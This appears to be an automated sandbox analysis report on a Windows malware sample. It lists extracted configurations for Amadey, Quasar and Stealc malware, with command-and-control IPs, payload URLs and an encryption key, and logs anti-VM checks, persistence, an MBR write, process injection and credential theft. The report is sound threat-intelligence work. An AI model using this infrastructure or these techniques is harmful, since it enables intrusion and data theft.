Analysis
-
max time kernel
135s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
25/03/2025, 06:24
Static task
static1
Behavioral task
behavioral1
Sample
a910f73ee1f155ed585016e76cf5532c.exe
Resource
win7-20241010-en
General
-
Target
a910f73ee1f155ed585016e76cf5532c.exe
-
Size
1.8MB
-
MD5
a910f73ee1f155ed585016e76cf5532c
-
SHA1
6da4a841d64bf75c15e0c2dd0a34fd6b1d2b6411
-
SHA256
fedcaf57f0459c113cf0b609ec2713b111e50d25d15e321ccaa5dc89d72528e8
-
SHA512
969e9fb7d3d33efeaee3f6f14374134e175848174efb4f2a3859bc46fd91ba7fc5ec75c5f003674d3922da388a3b62d6e326e338f9f622247d7d255a53a3ee32
-
SSDEEP
49152:HNGOCYrWWlIYr8RbY4ThJYh3xMETJrnkSRIw4qd/O:IgZG1M3xPJ7kqwqd/O
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
quasar
1.3.0.0
TELEGRAM
212.56.35.232:101
QSR_MUTEX_LoEArEgGuZRG2bQs0E
-
encryption_key
3wNfBQLmJMIJoFOXueXK
-
install_name
svchost.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchosta
-
subdirectory
media
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/13324-42787-0x0000000000480000-0x00000000008D8000-memory.dmp healer behavioral2/memory/13324-42786-0x0000000000480000-0x00000000008D8000-memory.dmp healer behavioral2/memory/13324-43187-0x0000000000480000-0x00000000008D8000-memory.dmp healer -
Healer family
-
description flow ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a910f73ee1f155ed585016e76cf5532c.exe 55 ip-api.com Process not Found 23430 ip-api.com Process not Found -
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral2/memory/5596-1549-0x0000000000400000-0x000000000045E000-memory.dmp family_quasar -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 2904 created 3548 2904 qQFhOl1.exe 56 PID 7284 created 3548 7284 qQFhOl1.exe 56 -
Contacts a large (8223) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a910f73ee1f155ed585016e76cf5532c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d156e36d9d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b2cae45d85.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 844eeb687f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5d8dc0c07d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bfb32a0700.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 13166 4172 powershell.exe 13173 1264 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 1264 powershell.exe 4172 powershell.exe 4396 powershell.exe 6404 powershell.exe 6396 powershell.exe 6492 powershell.exe -
Downloads MZ/PE file 22 IoCs
flow pid Process 28 3452 rapes.exe 63 3452 rapes.exe 43 3452 rapes.exe 14330 3452 rapes.exe 17482 3452 rapes.exe 23043 3452 rapes.exe 7612 3452 rapes.exe 7612 3452 rapes.exe 7612 3452 rapes.exe 23420 3452 rapes.exe 23420 3452 rapes.exe 23420 3452 rapes.exe 23420 3452 rapes.exe 23420 3452 rapes.exe 23420 3452 rapes.exe 58 1648 busdrv.exe 13166 4172 powershell.exe 13173 1264 powershell.exe 19613 6072 svchost.exe 23407 3452 rapes.exe 23411 2856 svchost015.exe 23419 5456 svchost015.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\Drivers\klupd_b30be13da_arkmon.sys 0ff9cf46.exe File created C:\Windows\System32\Drivers\klupd_b30be13da_klbg.sys 0ff9cf46.exe File created C:\Windows\System32\Drivers\b30be13d.sys 0ff9cf46.exe -
Sets service image path in registry 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_arkmon_7C924DD4\ImagePath = "\\??\\C:\\KVRT2020_Data\\Temp\\7C924DD4D20055C80007791130E2D03F\\klupd_b30be13da_arkmon.sys" 0ff9cf46.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\2Qj8BTe0_1440\ImagePath = "\\??\\C:\\Windows\\Temp\\2Qj8BTe0_1440.sys" tzutil.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\b30be13d\ImagePath = "System32\\Drivers\\b30be13d.sys" 0ff9cf46.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_arkmon\ImagePath = "System32\\Drivers\\klupd_b30be13da_arkmon.sys" 0ff9cf46.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_klbg\ImagePath = "System32\\Drivers\\klupd_b30be13da_klbg.sys" 0ff9cf46.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_klark\ImagePath = "System32\\Drivers\\klupd_b30be13da_klark.sys" 0ff9cf46.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_b30be13da_mark\ImagePath = "System32\\Drivers\\klupd_b30be13da_mark.sys" 0ff9cf46.exe -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a910f73ee1f155ed585016e76cf5532c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 844eeb687f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d156e36d9d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d156e36d9d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b2cae45d85.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a910f73ee1f155ed585016e76cf5532c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bfb32a0700.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 844eeb687f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5d8dc0c07d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5d8dc0c07d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b2cae45d85.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bfb32a0700.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation 01.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation download_807fb6fd5024da68.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation a910f73ee1f155ed585016e76cf5532c.exe -
Deletes itself 1 IoCs
pid Process 4424 w32tm.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ArgCount.vbs qQFhOl1.exe -
Executes dropped EXE 35 IoCs
pid Process 3452 rapes.exe 3536 844eeb687f.exe 2868 iqvtNlb.exe 3996 01.exe 1648 busdrv.exe 2156 download_807fb6fd5024da68.exe 2308 pcidrv.exe 4620 RTH4oNP.exe 2904 qQFhOl1.exe 4276 5d8dc0c07d.exe 2856 svchost015.exe 1548 rapes.exe 688 pcidrv.exe 5560 d156e36d9d.exe 5456 svchost015.exe 2456 5b577e2568.exe 6392 TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE 6200 iqvtNlb.exe 1372 483d2fa8a0d53818306efeb32d3.exe 6212 tK0oYx3.exe 4452 xu5e1_003.exe 6740 RTH4oNP.exe 1440 tzutil.exe 4424 w32tm.exe 6944 01.exe 6324 OkH8IPF.exe 7284 qQFhOl1.exe 7376 rapes.exe 7428 pcidrv.exe 7896 d2c2d62ab1.exe 7972 1ab149dc.exe 9456 0ff9cf46.exe 10148 b2cae45d85.exe 12692 bfb32a0700.exe 6660 6c8fb0ab10.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 844eeb687f.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 5d8dc0c07d.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine d156e36d9d.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine bfb32a0700.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine b2cae45d85.exe Key opened \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Software\Wine a910f73ee1f155ed585016e76cf5532c.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b30be13d.sys 0ff9cf46.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\b30be13d.sys\ = "Driver" 0ff9cf46.exe -
Loads dropped DLL 25 IoCs
pid Process 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe 9456 0ff9cf46.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\f0c1bbbf-bc2d-4c99-884f-41edee8a43f6 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{bb71cbc6-888b-43bf-9864-73ce38a6b086}\\f0c1bbbf-bc2d-4c99-884f-41edee8a43f6.cmd\"" 0ff9cf46.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b2cae45d85.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10329000101\\b2cae45d85.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bfb32a0700.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10329010101\\bfb32a0700.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6c8fb0ab10.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10329020101\\6c8fb0ab10.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5b577e2568.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10328890101\\5b577e2568.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10328900121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: 0ff9cf46.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 55 ip-api.com 23430 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 0ff9cf46.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000700000001e6c0-1616.dat autoit_exe behavioral2/files/0x00070000000242a2-42758.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 6088 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
pid Process 5476 a910f73ee1f155ed585016e76cf5532c.exe 3452 rapes.exe 3536 844eeb687f.exe 4276 5d8dc0c07d.exe 1548 rapes.exe 5560 d156e36d9d.exe 6392 TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE 1372 483d2fa8a0d53818306efeb32d3.exe 7376 rapes.exe 10148 b2cae45d85.exe 12692 bfb32a0700.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 4620 set thread context of 1304 4620 RTH4oNP.exe 126 PID 2904 set thread context of 5596 2904 qQFhOl1.exe 131 PID 4276 set thread context of 2856 4276 5d8dc0c07d.exe 133 PID 5560 set thread context of 5456 5560 d156e36d9d.exe 138 PID 6212 set thread context of 5808 6212 tK0oYx3.exe 164 PID 6740 set thread context of 1092 6740 RTH4oNP.exe 174 PID 6324 set thread context of 4740 6324 OkH8IPF.exe 184 PID 7284 set thread context of 7304 7284 qQFhOl1.exe 187 PID 7896 set thread context of 8040 7896 d2c2d62ab1.exe 194 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 1ab149dc.exe File opened (read-only) \??\VBoxMiniRdrDN 0ff9cf46.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job a910f73ee1f155ed585016e76cf5532c.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 44 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d156e36d9d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bfb32a0700.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 844eeb687f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xu5e1_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b2cae45d85.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6c8fb0ab10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0ff9cf46.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5b577e2568.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qQFhOl1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iqvtNlb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ab149dc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 6c8fb0ab10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qQFhOl1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5d8dc0c07d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 6c8fb0ab10.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a910f73ee1f155ed585016e76cf5532c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iqvtNlb.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 4272 timeout.exe 2612 timeout.exe 5112 timeout.exe -
Kills process with taskkill 7 IoCs
pid Process 3648 taskkill.exe 6896 taskkill.exe 13188 taskkill.exe 13380 taskkill.exe 13728 taskkill.exe 13956 taskkill.exe 14080 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ 01.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ download_807fb6fd5024da68.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 pcidrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e pcidrv.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3876 schtasks.exe 4408 schtasks.exe 6164 schtasks.exe 5148 schtasks.exe 4124 schtasks.exe 752 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5476 a910f73ee1f155ed585016e76cf5532c.exe 5476 a910f73ee1f155ed585016e76cf5532c.exe 3452 rapes.exe 3452 rapes.exe 3536 844eeb687f.exe 3536 844eeb687f.exe 3536 844eeb687f.exe 3536 844eeb687f.exe 3536 844eeb687f.exe 3536 844eeb687f.exe 2868 iqvtNlb.exe 2868 iqvtNlb.exe 1304 MSBuild.exe 1304 MSBuild.exe 1304 MSBuild.exe 1304 MSBuild.exe 2904 qQFhOl1.exe 2904 qQFhOl1.exe 4276 5d8dc0c07d.exe 4276 5d8dc0c07d.exe 1548 rapes.exe 1548 rapes.exe 5560 d156e36d9d.exe 5560 d156e36d9d.exe 4172 powershell.exe 4172 powershell.exe 4172 powershell.exe 6392 TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE 6392 TempZGBFEZEKBFNHTJHX2J5PUWKRLOM0QLUG.EXE 6492 powershell.exe 6492 powershell.exe 6492 powershell.exe 6404 powershell.exe 6404 powershell.exe 6404 powershell.exe 6396 powershell.exe 6396 powershell.exe 6200 iqvtNlb.exe 6200 iqvtNlb.exe 6396 powershell.exe 1264 powershell.exe 1264 powershell.exe 1264 powershell.exe 1372 483d2fa8a0d53818306efeb32d3.exe 1372 483d2fa8a0d53818306efeb32d3.exe 5808 MSBuild.exe 5808 MSBuild.exe 5808 MSBuild.exe 5808 